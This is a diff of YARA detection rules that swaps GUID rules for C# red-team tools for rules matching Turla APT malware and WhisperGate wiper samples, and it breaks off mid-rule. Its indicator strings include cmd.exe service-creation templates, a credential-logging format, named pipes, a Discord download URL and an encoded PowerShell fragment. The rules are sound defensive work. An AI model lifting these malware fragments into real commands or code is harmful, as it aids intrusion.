+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 2 of ( $x* ) or 8 of ( $s* ) ) ) or ( 12 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Decryptautologon : FILE
+rule SIGNATURE_BASE_RUAG_APT_Malware_Gen2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3ef58da9-16c1-54cf-9d06-a05680548cf5"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/securesean/DecryptAutoLogon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3372-L3386"
+		description = "Detects malware used in the RUAG APT case"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8a50e5d5-f16d-53c7-825c-a8e51c207eac"
+		date = "2016-06-09"
+		modified = "2023-01-06"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L73-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d8d05f568528616da30f0f35c3baf7ba762e33319a7d7975ddb23e42944884f"
-		score = 75
+		logic_hash = "62c65a5c85930dd2a928508401113ffba28bc6a07188d9bf5c68234bea10e1aa"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
+		hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
+		hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
+		hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
 
 	strings:
-		$typelibguid0lo = "015a37fc-53d0-499b-bffe-ab88c5086040" ascii wide
-		$typelibguid0up = "015A37FC-53D0-499B-BFFE-AB88C5086040" ascii wide
+		$x1 = "Internal command not support =((" ascii
+		$x2 = "L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|" fullword ascii
+		$x3 = "L|-1|CreateProcessAsUser():%d, %s|" fullword ascii
+		$x4 = "AS_CUR_USER:OpenProcessToken():%d" fullword ascii
+		$x5 = "L|-1|AS_CUR_USER:LogonUser():%d, %s|" fullword ascii
+		$x6 = "L|-1|try to run dll %s with user priv|" fullword ascii
+		$x7 = "\\\\.\\Global\\PIPE\\sdlrpc" fullword ascii
+		$x8 = "\\\\%s\\pipe\\comnode" fullword ascii
+		$x9 = "Plugin dll stop failed." fullword ascii
+		$x10 = "AS_USER:LogonUser():%d" fullword ascii
+		$s1 = "MSIMGHLP.DLL" fullword wide
+		$s2 = "msimghlp.dll" fullword ascii
+		$s3 = "ximarsh.dll" fullword ascii
+		$s4 = "msximl.dll" fullword ascii
+		$s5 = "INTERNAL.dll" fullword ascii
+		$s6 = "\\\\.\\Global\\PIPE\\" ascii
+		$s7 = "ieuser.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( 10 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Unstoppableservice : FILE
+rule SIGNATURE_BASE_Turla_APT_Malware_Gen3 : TURLA FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8c65fbee-d779-57a8-851b-7583be66c67a"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/malcomvetter/UnstoppableService"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3388-L3402"
+		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8cb7d873-e4f9-553e-84e8-dbc0d31f65ab"
+		date = "2016-06-09"
+		modified = "2023-12-05"
+		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L110-L150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1b2039d27bfaa624b47886e7a310e6b2ec0f6063e973e449270dfca54a7bdd7b"
+		logic_hash = "8c24cf71841efc974c8a4d8eb5662137592c1d454821c9beadc50d83cb19333c"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "TURLA, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		family = "Turla"
+		hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
+		hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
+		hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
+		hash4 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
+		hash5 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
+		hash6 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
+		hash7 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
+		hash8 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
+		hash9 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
 
 	strings:
-		$typelibguid0lo = "0c117ee5-2a21-dead-beef-8cc7f0caaa86" ascii wide
-		$typelibguid0up = "0C117EE5-2A21-DEAD-BEEF-8CC7F0CAAA86" ascii wide
+		$x1 = "\\\\.\\pipe\\sdlrpc" fullword ascii
+		$x2 = "WaitMutex Abandoned %p" fullword ascii
+		$x3 = "OPER|Wrong config: no port|" fullword ascii
+		$x4 = "OPER|Wrong config: no lastconnect|" fullword ascii
+		$x5 = "OPER|Wrong config: empty address|" fullword ascii
+		$x6 = "Trans task %d obj %s ACTIVE fail robj %s" fullword ascii
+		$x7 = "OPER|Wrong config: no auth|" fullword ascii
+		$x8 = "OPER|Sniffer '%s' running... ooopppsss...|" fullword ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" fullword ascii
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" fullword ascii
+		$s3 = "www.yahoo.com" fullword ascii
+		$s4 = "MSXIML.DLL" fullword wide
+		$s5 = "www.bing.com" fullword ascii
+		$s6 = "%s: http://%s%s" fullword ascii
+		$s7 = "/javascript/view.php" fullword ascii
+		$s8 = "Task %d failed %s,%d" fullword ascii
+		$s9 = "Mozilla/4.0 (compatible; MSIE %d.0; " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 6 of ( $s* ) ) ) or ( 10 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwmi_2 : FILE
+rule SIGNATURE_BASE_Turla_Mal_Script_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e6ab2f5e-2a5a-5be9-9b66-96cb745fd199"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		old_rule_name = "HKTL_NET_GUID_SharpWMI"
-		reference = "https://github.com/GhostPack/SharpWMI"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3404-L3419"
+		description = "Detects Turla malicious script"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4b550b3c-182c-5dc0-b2d2-13925c22be81"
+		date = "2018-01-19"
+		modified = "2023-12-05"
+		reference = "https://ghostbin.com/paste/jsph7"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L152-L169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2541e7eeb07ee9d018067c35765c9ad68c9c8ecf0baa723e410dde8c55dabbd0"
+		logic_hash = "2386abf8afdf8ed9cfd55cb3dcbb998eb732744c601fd9af701cf64c366a0e62"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "180b920e9cea712d124ff41cd1060683a14a79285d960e17f0f49b969f15bfcc"
 
 	strings:
-		$typelibguid0lo = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii wide
-		$typelibguid0up = "6DD22880-DAC5-4B4D-9C91-8C35CC7B8180" ascii wide
+		$s1 = ".charCodeAt(i % " ascii
+		$s2 = "{WScript.Quit();}" fullword ascii
+		$s3 = ".charAt(i)) << 10) |" ascii
+		$s4 = " = WScript.Arguments;var " ascii
+		$s5 = "= \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";var i;" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ewstoolkit : FILE
+
+rule SIGNATURE_BASE_Turla_Kazuarrat : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "acde7744-d17f-5e47-a5e2-ff4f4c4d8093"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/rasta-mouse/EWSToolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3421-L3435"
+		description = "Detects Turla Kazuar RAT described by DrunkBinary"
+		author = "Markus Neis / Florian Roth"
+		id = "147cc7b7-6dbd-51a2-9501-bcbaec32e20e"
+		date = "2018-04-08"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/DrunkBinary/status/982969891975319553"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L173-L192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bc7f82779efec8a5e2a6a861a8e7a50e71e0b1e8891618f56bd12e0ce09eefc3"
+		logic_hash = "d7f15fe8e33a9e3516eab5c3c5664aeee25d1d153f01b888a50dd2accba432ca"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6b5d9fca6f49a044fd94c816e258bf50b1e90305d7dab2e0480349e80ed2a0fa"
+		hash2 = "7594fab1aadc4fb08fb9dbb27c418e8bc7f08dadb2acf5533dc8560241ecfc1d"
+		hash3 = "4e5a86e33e53931afe25a8cb108f53f9c7e6c6a731b0ef4f72ce638d0ea5c198"
 
 	strings:
-		$typelibguid0lo = "ca536d67-53c9-43b5-8bc8-9a05fdc567ed" ascii wide
-		$typelibguid0up = "CA536D67-53C9-43B5-8BC8-9A05FDC567ED" ascii wide
+		$x1 = "~1.EXE" wide
+		$s2 = "dl32.dll" fullword ascii
+		$s3 = "HookProc@" ascii
+		$s4 = "0`.wtf" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.imphash ( ) == "682156c4380c216ff8cb766a2f2e8817" or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sweetpotato : FILE
+rule SIGNATURE_BASE_MAL_Turla_Agent_BTZ : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0e347d94-51eb-5589-93d8-b19fec7f2365"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/CCob/SweetPotato"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3437-L3453"
+		description = "Detects Turla Agent.BTZ"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bd642f11-19f6-5178-b978-1215215fea86"
+		date = "2018-04-12"
+		modified = "2023-01-06"
+		reference = "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L195-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a514be8ef3b51a3cad22a470afd9a4911c7156bfbf14f0a33522b429041e5bb"
-		score = 75
+		logic_hash = "3a091d29ef5981b9ab9c0e4114fef9de70acbcbc8ea8518183a567459e1086fa"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8"
 
 	strings:
-		$typelibguid0lo = "6aeb5004-6093-4c23-aeae-911d64cacc58" ascii wide
-		$typelibguid0up = "6AEB5004-6093-4C23-AEAE-911D64CACC58" ascii wide
-		$typelibguid1lo = "1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e" ascii wide
-		$typelibguid1up = "1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E" ascii wide
+		$x1 = "1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s" fullword ascii
+		$x3 = "mstotreg.dat" fullword ascii
+		$x4 = "Bisuninst.bin" fullword ascii
+		$x5 = "mfc42l00.pdb" fullword ascii
+		$x6 = "ielocal~f.tmp" fullword ascii
+		$s1 = "%s\\1.txt" fullword ascii
+		$s2 = "%windows%" fullword ascii
+		$s3 = "%s\\system32" fullword ascii
+		$s4 = "\\Help\\SYSTEM32\\" ascii
+		$s5 = "%windows%\\mfc42l00.pdb" ascii
+		$s6 = "Size of log(%dB) is too big, stop write." fullword ascii
+		$s7 = "Log: Size of log(%dB) is too big, stop write." fullword ascii
+		$s8 = "%02d.%02d.%04d Log begin:" fullword ascii
+		$s9 = "\\system32\\win.com" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Memscan : FILE
+rule SIGNATURE_BASE_MAL_Turla_Sample_May18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "35175fe1-a583-50d1-8b0c-71f19b898817"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/nccgroup/memscan"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3455-L3469"
+		description = "Detects Turla samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5052838f-a895-55cb-abcf-813465074127"
+		date = "2018-05-03"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/omri9741/status/991942007701598208"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L228-L250"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "099c6dfc9f30e56eca9834431eb527194e0302c9c6ef88f3c4fc91837a7aad7a"
+		logic_hash = "f5bb26bc787acb89fe5a337121aabc0cd15ed3fd5cbe64ef4e7031e04dc14fb1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4c49c9d601ebf16534d24d2dd1cab53fde6e03902758ef6cff86be740b720038"
+		hash2 = "77cbd7252a20f2d35db4f330b9c4b8aa7501349bc06bbcc8f40ae13d01ae7f8f"
 
 	strings:
-		$typelibguid0lo = "79462f87-8418-4834-9356-8c11e44ce189" ascii wide
-		$typelibguid0up = "79462F87-8418-4834-9356-8C11E44CE189" ascii wide
+		$x1 = "sc %s create %s binPath= \"cmd.exe /c start %%SystemRoot%%\\%s\">>%s" fullword ascii
+		$x2 = "cmd.exe /c start %%SystemRoot%%\\%s" fullword ascii
+		$x3 = "cmd.exe /c %s\\%s -s %s:%s:%s -c \"%s %s /wait 1\">>%s" fullword ascii
+		$x4 = "Read InjectLog[%dB]********************************" fullword ascii
+		$x5 = "%s\\System32\\011fe-3420f-ff0ea-ff0ea.tmp" fullword ascii
+		$x6 = "**************************** Begin ini %s [%d]***********************************************" fullword ascii
+		$x7 = "%s -o %s -i %s -d exec2 -f %s" fullword ascii
+		$x8 = "Logon to %s failed: code %d(User:%s,Pass:%s)" fullword ascii
+		$x9 = "system32\\dxsnd32x.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpstay : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr20_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e5bde5a9-8e09-59ce-ad01-e29836813cf8"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/0xthirteen/SharpStay"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3471-L3485"
+		description = "Detects Turla Linux malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f21e7793-a7dd-5195-805d-963827b35808"
+		date = "2020-04-05"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/Int2e_/status/1246115636331319309"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L252-L272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3750df9725c739fad99d2ce5d3fab0c84112c1efb2e4e5a1348501174c4ce494"
+		logic_hash = "d463f5a151bb0c3440d719b4c7c0d1ca34de1e0bed7fb9167ecf396607abd3ff"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
+		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
 
 	strings:
-		$typelibguid0lo = "2963c954-7b1e-47f5-b4fa-2fc1f0d56aea" ascii wide
-		$typelibguid0up = "2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA" ascii wide
+		$s1 = "/root/.hsperfdata" ascii fullword
+		$s2 = "Desc|     Filename     |  size  |state|" ascii fullword
+		$s3 = "IPv6 address %s not supported" ascii fullword
+		$s4 = "File already exist on remote filesystem !" ascii fullword
+		$s5 = "/tmp/.sync.pid" ascii fullword
+		$s6 = "'gateway' supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x457f and filesize < 5000KB and 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharplocker : FILE
+rule SIGNATURE_BASE_APT_MAL_Tinyturla_Sep21_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9525422a-d670-5475-abdc-b7ecd1ab9943"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/Pickfordmatt/SharpLocker"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3487-L3501"
+		description = "Detects Tiny Turla backdoor DLL"
+		author = "Cisco Talos"
+		id = "19659ac7-310a-52dd-a94c-022c7add752b"
+		date = "2021-09-21"
+		modified = "2023-12-05"
+		reference = "https://blog.talosintelligence.com/2021/09/tinyturla.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L275-L295"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "47cffdd5ffdf11c8afb16c031c6f44b0857ed369b2913a8c43b11bdb9d446171"
+		logic_hash = "ede598374bc4a8a870aa29498be4200b4a3d7b289dfcb680fb3f91108d212bca"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "030cbd1a51f8583ccfc3fa38a28a5550dc1c84c05d6c0f5eb887d13dedf1da01"
 
 	strings:
-		$typelibguid0lo = "a6f8500f-68bc-4efc-962a-6c6e68d893af" ascii wide
-		$typelibguid0up = "A6F8500F-68BC-4EFC-962A-6C6E68D893AF" ascii wide
+		$a = "Title: " fullword wide
+		$b = "Hosts" fullword wide
+		$c = "Security" fullword wide
+		$d = "TimeLong" fullword wide
+		$e = "TimeShort" fullword wide
+		$f = "MachineGuid" fullword wide
+		$g = "POST" fullword wide
+		$h = "WinHttpSetOption" fullword ascii
+		$i = "WinHttpQueryDataAvailable" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sauroneye : FILE
+rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Jan22_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3b624dde-a63e-58ac-a4db-af931f1d8553"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/vivami/SauronEye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3503-L3519"
+		description = "Detects unknown wiper malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f04b619e-1df2-5c51-9cab-4a0fffd1c042"
+		date = "2022-01-16"
+		modified = "2023-12-05"
+		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_wiper_whispergate.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4f73dabd483ad1c45e6225ef8ef664f6db1ec75a6aa300a0a6efaa63e64b2c3a"
-		score = 75
+		logic_hash = "72eb50a70b3f2fbb232134ef4706dbb15bdb5893fe06d899bff3b7aacdfadd30"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92"
 
 	strings:
-		$typelibguid0lo = "0f43043d-8957-4ade-a0f4-25c1122e8118" ascii wide
-		$typelibguid0up = "0F43043D-8957-4ADE-A0F4-25C1122E8118" ascii wide
-		$typelibguid1lo = "086bf0ca-f1e4-4e8f-9040-a8c37a49fa26" ascii wide
-		$typelibguid1up = "086BF0CA-F1E4-4E8F-9040-A8C37A49FA26" ascii wide
+		$xc1 = { 41 41 41 41 41 00 59 6F 75 72 20 68 61 72 64 20
+               64 72 69 76 65 20 68 61 73 20 62 65 65 6E 20 63
+               6F 72 72 75 70 74 65 64 }
+		$op1 = { 89 34 24 e8 3f ff ff ff 50 8d 65 f4 31 c0 59 5e 5f }
+		$op2 = { 8d bd e8 df ff ff e8 04 de ff ff b9 00 08 00 00 f3 a5 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 c7 44 24 10 03 00 00 00 c7 44 24 0c 00 00 00 00 }
+		$op3 = { c7 44 24 0c 00 00 00 00 c7 44 24 08 00 02 00 00 89 44 24 04 e8 aa fe ff ff 83 ec 14 89 34 24 e8 3f ff ff ff 50 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) or all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sitrep : FILE
+rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Jan22_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5f2ac63e-4be1-520c-82b1-1957027a63e2"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/mdsecactivebreach/sitrep"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3521-L3535"
+		description = "Detects unknown wiper malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "822e5af5-9c51-5be3-94f1-7e0a714743e6"
+		date = "2022-01-16"
+		modified = "2023-12-05"
+		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_wiper_whispergate.yar#L25-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c7fa4e8bd94d86218c22c1be99221b25406e7fbae54cfadb53f81720d167e8ce"
-		score = 75
+		logic_hash = "87a03e95bc1c33d1b3343ec7369c516bb15791943fbb122de11867ad4bddd565"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
 
 	strings:
-		$typelibguid0lo = "12963497-988f-46c0-9212-28b4b2b1831b" ascii wide
-		$typelibguid0up = "12963497-988F-46C0-9212-28B4B2B1831B" ascii wide
+		$sc1 = { 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00
+               6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00
+               55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00
+               63 00 67 00 42 00 30 00 41 00 43 }
+		$sc2 = { 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00
+               70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68 }
+		$s1 = "xownxloxadDxatxxax" wide
+		$s2 = "0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==" wide
+		$s3 = "https://cdn.discordapp.com/attachments/" wide
+		$s4 = "fffxfff.fff" ascii fullword
+		$op1 = { 20 6b 85 b9 03 20 14 19 91 52 61 65 20 e1 ae f1 }
+		$op2 = { aa ae 74 20 d9 7c 71 04 59 20 71 cc 13 91 61 20 97 3c 2a c0 }
+		$op3 = { 38 9c f3 ff ff 20 f2 96 4d e9 20 5d ae d9 ce 58 20 4f 45 27 }
+		$op4 = { d4 67 d4 61 80 1c 00 00 04 38 35 02 00 00 20 27 c0 db 56 65 20 3d eb 24 de 61 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them or 7 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpclipboard : FILE
+rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Stage3_Jan22 : FILE
 {
 	meta:
